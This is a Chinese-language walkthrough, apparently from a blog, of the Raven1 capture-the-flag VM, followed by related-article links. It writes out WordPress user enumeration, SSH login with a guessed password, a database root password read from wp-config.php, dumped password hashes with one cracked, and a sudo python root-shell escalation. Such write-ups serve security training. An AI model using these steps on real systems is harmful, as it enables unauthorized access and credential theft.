Raven1渗透实战
Raven1渗透实战
目录:
1.wordpress爆破用户
2.wp-config得到数据库账号密码
3.ssh连接
4.pythn提权(sudo python -c 'import pty;pty.spawn("/bin/bash")')
主机发现与信息收集
arp-scan –l

nmap -sS -A -p- 192.168.8.127 –n

Web渗透实战
可以先修改一下hosts:
192.168.8.127 raven.local
进入web端,浓浓的wordpress风格
http://192.168.8.127/wordpress/
wordpress爆用户
小tips:http://192.168.8.127/wordpress/?author=n (n=1,2,3,4……)
http://192.168.8.127/wordpress/?author=1
出现用户: MICHAEL (michael)

找到后台 http://raven.local/wordpress/wp-login.php (michael登录失败)
dir爆目录
出现几个可疑的目录:
http://192.168.8.127/vendor
http://192.168.8.127/wordpress/
继续爆这几个关键目录:

看到pop3、phpmail和smtp就能想到应该和邮件有关的,应该是入口

在wordpress中罕见 http://192.168.8.127/service.html 并右键查看源代码
Get到第一个flag:
flag1{b9bbcb33e11b80be759c4e844862482d}

继续浏览爆出来的目录
http://192.168.8.127/vendor/PATH 暴露了系统路径,也许之后会用到
/var/www/html/vendor/

http://192.168.8.127/vendor/VERSION 暴露了版本信息 5.2.16

发现http://192.168.8.127/vendor/SECURITY.md 有提示

从爆出来的这些目录来看,无疑是在提示从phpmailer入手
这时想到了goldeneye中的pop3服务
Nmap扫出来的端口中没有pop3和smtp服务
只能从22端口ssh入手了
ssh登录
尝试登录ssh,用户名就用wordpress暴露的用户 michael,密码尝试用 michael
ssh michael@192.168.8.127
登录成功,果然提示有邮件mail,然而并没有邮件提示

直接全局搜flag
find / -name "*flag*" 2>/dev/null

cat /var/www/flag2.txt

get第二个flag:
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
常规提权
netstat –a
发现主机开启的端口和服务

在靶机的3306端口开启了mysql服务
进入wordpress目录,查看conf配置文件,查看数据库密码
vi wp-config.php

root / R@v3nSecurity
直接登录靶机的数据库
mysql -u root –p

进入wordpress数据中,发现wp_posts表,应该是post数据
select * from wp_posts;
发现了flag3和flag4:

flag3{afc01ab56b50591e7dccf93122770cd2}
flag4{715dea6c055b9fe3337544932f2941ce}
查看wordpress数据库中的users表

michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0
steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
md5解看看

steven 的密码为 pink84
michael的解不出来
拿去登录一下ssh试试
ssh steven@192.168.8.127

sudo –l
显示出当前用户的权限,发现可以运行python,直接python提权
sudo python -c 'import pty;pty.spawn("/bin/bash")'

得到第四个flag:

Raven1渗透实战的更多相关文章
- 【渗透实战】记一次艰难的内网漫游第四期_蹭我WIFI?看我如何利用组合拳日进蹭网者内网
/文章作者:Kali_MG1937 CSDN博客ID:ALDYS4 QQ:3496925334/ 内网漫游系列第三期:[渗透实战]记一次艰难的内网漫游第三期_我是如何利用APT攻击拿到内网最高权限的 ...
- 【渗透实战】那些奇葩的WAF_第二期_无意发现通杀漏洞,空字节突破上传!
/文章作者:Kali_MG1937 CSDN博客号:ALDYS4 QQ:3496925334 未经许可,禁止转载/ 该博文为本人18年左右的渗透记录,文法粗糙,技术含量极低,流水账文章,且今日不知为何 ...
- PowerUp攻击渗透实战
记录下PowerUp在实战渗透中的利用 准备环境: kali linux 攻击机 已获得靶机meterpreter(非管理)权限 win7 靶机 拥有powershell环境 1)Invoke-Al ...
- PowerSploit-CodeExecution(代码执行)脚本渗透实战
首先介绍一下国外大牛制作的Powershell渗透工具PowerSploit,上面有很多powershell攻击脚本,它们主要被用来渗透中的信息侦察.权限提升.权限维持. 项目地址:https://g ...
- Burp Suite渗透实战操作指南-上篇
Burp必备知识 在介绍功能之前有必要让大家了解一些burp的常用功能,以便在使用中更好的发挥麒麟臂的优势. 1.1 快捷键 很多人可能都没用过burp的快捷键吧,位置如下,不说话,如果不顺手可以自 ...
- 【渗透实战】web渗透实战,手动拿学校站点 得到上万人的信息(漏洞已提交)
------------恢复内容开始------------ ’‘’版权tanee转发交流学校请备注漏洞已经提交学校管理员关键过程的截图和脚本代码已经略去.希望大家学习技术和思路就好,切勿进行违法犯罪 ...
- DC-8靶机渗透实战
前言: 本文将讲述通过信息收集,再web站点的sql注入漏洞加john爆破登录后台,然后找到远程代码执行漏洞getshell,最后用exim4命令提权漏洞进行权限提升拿到最终的flag. 0x00 环 ...
- 【渗透实战】那些年我们遇到的奇葩WAF_第一期_请求方式绕过
/文章作者:Kali_MG1937 CSDN博客:ALDYS4 QQ:3496925334/ 该博文为本人18年左右的渗透记录,文法粗糙,技术含量极低,流水账文章,且今日不知为何被顶上博客首页 为了避 ...
- 【渗透实战】sqlmap_修改tamper脚本_绕过WAF_第三期
/文章作者:Kali_MG1937 CSDN博客号:ALDYS4 QQ:3496925334/ 今天google找注入点的时候发现某企业一个挺有意思的waf 常规操作绕过去后决定写一篇博客 信息收集 ...
随机推荐
- vue+element-ui:table表格中的slot 、formatter属性
slot 插槽,table中表示该行内容以自定义方式展示 :formatter 方法,用来格式化内容 Function(row, column, cellValue, index) html < ...
- 【CentOS7】Apache发布静态网页-超简单
目前能够提供Web网络服务的程序有 IIS. Nginx和 Apache等.其中,IIS (Internet Information Services,互联网信息服务)是 Windows系统中默认的 ...
- Python+Selenium+Unittest实现PO模式web自动化框架(6)
1.TestCases目录下的模块 TestCases目录下是存放测试用例的目录. TestCases目录下的测试用例采用unittest框架来构建. 例如:登录功能的测试用例.(test_1_log ...
- pull push 监控指标
Prometheus 原理介绍 - 知乎 https://zhuanlan.zhihu.com/p/70090800 Prometheus由Go语言编写而成,采用Pull方式获取监控信息,并提供了多维 ...
- JAVAV EMAIL
package a; import java.util.Date;import java.util.Properties;import javax.mail.Authenticator;import ...
- Python学习【第6篇】:集合的定义和基本方法
1.概念 (1)不同元素组成 例: s = {1,2,3,4,4,4,4,4,4}print(s)运行结果:{1, 2, 3, 4}因为是不同元素组成,因此去重了 (2)无序 例: s = {&quo ...
- cogs 2566 字符串最大值
2566. [51nod 1129] 字符串最大值 ★★ 输入文件:string_maxval.in 输出文件:string_maxval.out 简单对比时间限制:1 s 内存限制: ...
- java线程缓存刷新的疑问
https://www.jianshu.com/p/3c06ffbf0d52 import java.util.concurrent.TimeUnit; public class VolatileFo ...
- HBase与Zookeeper的关系
HBase与Zookeeper的关系 一.HBase与Zookeeper的关系 Zookeeper Client Master RegionServer 一.HBase与Zookeeper的关系 Cl ...
- 渗透测试工具-sqlmap
简单来说:一个用来做sql注入攻击的工具 安装 1,下载sqlmap.zip,下载环境: 打开sqlmap官网https://github.com/sqlmapproject/sqlmap/ :下载p ...